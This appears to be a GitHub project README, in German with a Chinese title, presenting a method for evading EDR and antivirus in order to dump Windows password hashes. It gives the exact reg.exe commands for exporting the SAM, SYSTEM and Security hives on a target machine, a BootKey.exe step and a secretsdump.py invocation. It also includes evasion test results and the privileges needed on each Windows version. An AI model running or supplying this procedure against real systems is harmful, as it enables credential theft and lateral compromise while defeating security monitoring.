
Windows绕过EDR实现DumpHash
Durch die erweiterte Nutzung des vom System als vertrauenswürdig eingestuften Programms Reg.exe werden die Abfangpunkte der Antivirensoftware geschickt umgangen, wodurch das Ziel erreicht wird, EDR zu umgehen und Hashes zu dumpen.
Nach praktischen Tests ist diese Methode gegen Windows-Systeme wirksam, ihre Durchführung ist unkompliziert und sie besitzt realen Einsatzwert.
Praktische Artikel zu diesem Projekt:
Nach der Veröffentlichung des Artikels fand sich in inländischen und internationalen Communities kein vergleichbarer Ansatz, und ich hielt ihn ursprünglich für eine Weltpremiere. Später zeigten Kommentare von Followern jedoch, dass dieser Ansatz bereits zuvor von einem Experten im Ausland geteilt wurde: Dumping LSA secrets: a story about task decorrelation
Der Quellcode und die Releases zu diesem Artikel sind auf GitHub veröffentlicht. Das Teilen war nicht leicht – wenn Ihnen das Projekt gefällt, geben Sie ihm gerne einen Star. Vielen, vielen Dank!
Führen Sie auf dem Zielsystem den folgenden Befehl aus, um die .reg-Dateien zu exportieren:
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Laden Sie die .reg-Dateien aus Schritt 1 auf den lokalen Rechner herunter und führen Sie dort das PowerShell-Skript RegReduction.ps1 dieses Projekts aus, um die Binärdateien wiederherzustellen:
.\RegReduction.ps1
Hinweis: Nach dem Herunterladen des Skripts von GitHub ist die Kodierung standardmäßig UTF-8; sie muss mit Notepad in ANSI (GB2312) geändert werden, damit das Skript normal ausgeführt werden kann.

Führen Sie auf dem Zielsystem das ausführbare Programm BootKey.exe aus; der Quellcode befindet sich in der Datei BootKey.c dieses Projekts:
BootKey.exe

AV-Bypass-Test (2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

Dieser Artikel umfasst mehrere kritische Vorgänge; die Kernschritte auf dem Zielsystem sind jedoch nur zwei:
reg.exe export;BootKey.exe.Es wurden auch Tests mit verschiedenen Systemen durchgeführt, mit folgendem Ergebnis:
reg.exe export unter Win10, Win11 und Windows Server 2025 SYSTEM-Rechte, während unter Windows Server 2022 und älteren Versionen dafür lediglich normale Administratorrechte erforderlich sind (keine SYSTEM-Rechte nötig). Ist die nach der Ausführung von reg.exe export exportierte Registrierungsdatei nur 1 KB groß, reichen die Berechtigungen nicht aus.BootKey.exe keine Administratorrechte; zudem wird er von den meisten Antivirenprogrammen nicht erkannt bzw. blockiert (bisher hat keines der getesteten es erkannt).